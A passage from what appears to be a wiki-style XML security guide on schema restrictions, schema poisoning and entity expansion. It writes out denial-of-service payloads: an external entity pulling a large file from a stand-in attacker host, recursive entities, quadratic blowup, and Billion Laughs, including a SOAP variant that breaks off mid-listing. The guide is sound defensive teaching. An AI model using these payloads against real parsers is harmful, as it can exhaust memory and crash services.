The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values Infinity and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type decimal is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
Code Sample 23: An XML Schema providing a set of restrictions over the document on Code 18&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
